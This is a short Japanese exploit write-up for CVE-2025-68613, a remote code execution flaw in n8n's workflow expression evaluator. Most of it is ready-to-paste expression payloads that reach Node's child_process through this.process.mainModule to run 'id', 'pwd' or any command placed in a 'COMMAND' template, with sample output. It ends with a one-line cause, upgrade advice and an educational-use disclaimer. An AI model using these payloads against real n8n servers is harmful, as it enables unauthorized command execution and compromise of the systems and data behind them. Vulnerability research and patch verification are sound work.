
CVE-2025-68613: n8n RCE 脆弱性の悪用とドキュメント
n8nは、ワークフロー式評価システムに深刻な任意コード実行の脆弱性を含んでいます。特定の条件下において、ワークフロー設定中に認証されたユーザーが提供した式が、基礎となるランタイムから十分に隔離されていない実行コンテキストで評価される可能性があります。
次のペイロードを式フィールドに貼り付けます:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

IDコマンド:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}
PWDコマンド:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}
カスタムコマンドテンプレート:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('COMMAND').toString() })() }}
idコマンドの場合:
uid=1000(node) gid=1000(node) groups=1000(node)
pwdコマンドの場合:
/app
式評価器には、関数式が this.process(Node.jsのプロセスオブジェクト)にアクセスするのを防ぐサニタイザーがなく、システムモジュールへのアクセスを許容しています。
n8n v1.122.0以降にアップグレードしてください。
免責事項: この情報はサンドボックスおよび教育目的でのみ提供されています。この情報をシステムの悪用に使用することは違法かつ非倫理的です。脆弱性のテストや悪用を行う前に、必ず適切な許可を取得してください。